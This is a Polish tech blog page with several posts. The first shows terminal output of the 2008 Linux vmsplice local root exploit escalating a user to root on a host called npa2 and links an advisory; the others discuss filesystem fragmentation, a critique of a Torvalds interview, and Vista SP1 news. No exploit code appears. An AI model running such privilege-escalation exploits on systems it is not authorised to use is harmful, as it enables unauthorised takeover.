NPA zhackowane

linux, OT

cabi@npa2:~$ whoami
cabi
cabi@npa2:~$ ./magic.out
———————————–
Linux vmsplice Local Root Exploit
———————————–
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0xb7e24000 .. 0xb7e56000
[+] root
root@npa2:~# whoami
root

UPDATE: to exploit ktory ukazał się 9.lutego i wykorzystuje vmsplice() – nie cieszcie się już jest łatka ;)

UPDATE: http://secunia.com/advisories/28875/ 

fragmentacja

2 komentarzetips'n'tricks

klucilismy sie ostatnio z cabim o fragmentacje. padlo stwierdzenie, ze system ext3 nie wymaga defragmentacji. dysqsja ropoczela sie pytaniem na quiz2oo8 czy w w2k8 jest defrag. nie wiem ile osob pamieta, ale w w2k defraga standardowo nie bylo. huknal wtedy mit o tym, ze NTFS sie nie fragmentuje. co gorsze – mit podpierany oficjalnymi podrecznikami MOC do qrsow!
poniewaz niepewne argumenty co do systemow raiserfs i innych wymagaly podparcia, znalazlem taki fragment:
„Jedyny FS ktory znam, ktory nie tylko zapobiega fragmentacji, ale
tez automatycznie sie defragmentuje i to w locie, to jest HPFS.
co ciekawe, ten FS ponadto optymalizuje dostep do plikow lub ich
fragmentow. pliki czesto uzywane, sa automatycznie przemieszczane
do obszarow, w ktorych sa szybciej dostepne. plik sfragmentowany,
podczas odczytu moze byc przepisywany aby ulegl defragmentacji.
tyle ze w pelni HPFS jest supportowany tylko pod komercyjnym
i obecnie wymierajacym OS/2. Linux wspiera HPFS tylko do odczytu.
Linux moze zamontowac HPFS do zapisu, ale wymaga to zalozenia
lat na kernel, oraz nie wszystkie cechy FS sa wspomagane,
np. automatyczna defragmentacja. Jest to zrozumiale, bo
opis i algorytmy HPFS nie sa przez IBM ujawnione.
Szkoda ze takimi cechami nie dysponuje ext2/ext3/raiserfs i inne.
btw. ext2/ext3/raiserfs w toporny sposob obsluguja zapis
atrybutow rozszerzonych, co znakomicie utrudnia standaryzacje
takich mechanizmow jak np. ACL, lub wizualne atrybuty plikow/katalogow
w menadzerach okien.”

ze tej strony, tutaj rowniez

linus to neandertalczyk

1 Komentarzlinux, social

na computerworldzie pojawil sie wywiad z linusem torvaldsem. niesamowite jakim zacofaniem wykazuje sie ten koles.
„I don’t even have a mobile phone! […] I hate phones because they just disturb you, and mobile phones are even worse because you have them with you all the time, so I don’t do mobile phones at all.
nie uzywa komorki – jego wybor. raczej kwestia pracy, sposobu zycia i checi kontaktu z innymi. raczej oznaka izolacji niz powod do dumy. rowniez nie lubie, kiedy w momencie wymaganego sqpienia ktos mi przeszkadza – np. tel, ale urzadzenia maja to do siebie, ze da sie je wylaczyc, odlozyc w inne miejsce, lub [ale to chyba dla niego zbyt zaawansowana funkcja] ustawic aby wydawala sygnal tylko jesli dzwoni wybrana grupa osob. dzieki temu w razie 'czegos’ mam kontakt z najwazniejszymi osobami… z reszta…

mozna przycztac dalej:
„What do you think of the various Linux distributions?

People talk about how different they are but they actually all end up using pretty much the same kernel, so I suppose as far as I’m concerned there is very little difference between them.”

ignorancja godna developera z klapkami na oczach. caly swiat, caly biznes – i cala podstawa sukcesu microsftu – dobry, intuicyjny interfejs. zreszta to samo bylo w arcie o operze z poprzedniego wpisu. a ten koles stwierdza, ze dystrybucje sie nie roznia, bo maja taki sam kernel. mam wrazenie, ze ten czlowiek jest z kosmosu i nie za bardzo wie czemu jedna dystrybucja sie przyjmuje a inna umiera – ubuntu wygralo wysoka pozycje dzieki latemu instalatorowi, intuicyjnej obsludze i dobrze skonstruowanemu interfejsowi a nie dzieki temu co jest w kernelu, co interesuje pewnie 2%… no moze w przypadq linuxa – nieche bedzie 2o% userow.

i wkoncu wirtualizacja:

„I think it has been over hyped a bit, it’s one of those hot buzz word type of things.”

..po czym nastepuje tlumaczenie czemu jej nie uzywa co w skrocie mozna okreslic 'bo jest mi niepotrzebna’. wydaje mi sie, ze w przypadq wirtualizacji, zordmuchanie tego slowa nie jest przypadkowe i nie jest chwytem marketingowym a wynikiem szerokich potrzeb calego rynq. mozna samemu nie uzywac [choc nie wyobrazam sobie na dzis dziedziny it gdzie wirtualiki sie nie przydaja – chocby do glupich testow] ale pomniejszac jej znaczenie jest imho duza krotkowzrocznoscia.

wpis jest tendencyjny ale cala reszta dotyczny sfery technicznej i nie ma sie co czepiac. zawsze uwazalem linusa za osobe bardziej otwarta, i ze zdzwieniem przeczytalem takie stwierdzenia.
lekture polecam

vista SP1 w w2k8

windows

niby juz RTM ale niestety na MSDN ani WU jeszcze nie ma. w2k8 w wersji x64 juz na MSDN obie wesrcie x32 i x64 na connect’cie. ciekawostka sa klucze do wersji RTM do wykorzystania w LABie – nie wiem jeszcze jakie sa ograniczenia takiej warsji.
pojawil sie tez oficjalny dokument opisujacy zmiany wprowadzone przez SP1

najblizszy miesiac bedzie ciekawy – po roq przygotowan do w2k8 i totalnej krytyki vista, nadeszla ciezka chwila weryfikacji. swiat ze sceptyzmem oczeqje na efekty SP1 i czeka na porazke w2k8 podobna do vista… mysle, ze pracownikow emesa czekaja ciezkie chwile oczekiwania

**UPDATE
i jeszcze ciekawy i pozytywny link

ehhh… a na WU ciagle nie ma … ciekawe czemu tak przeciagaja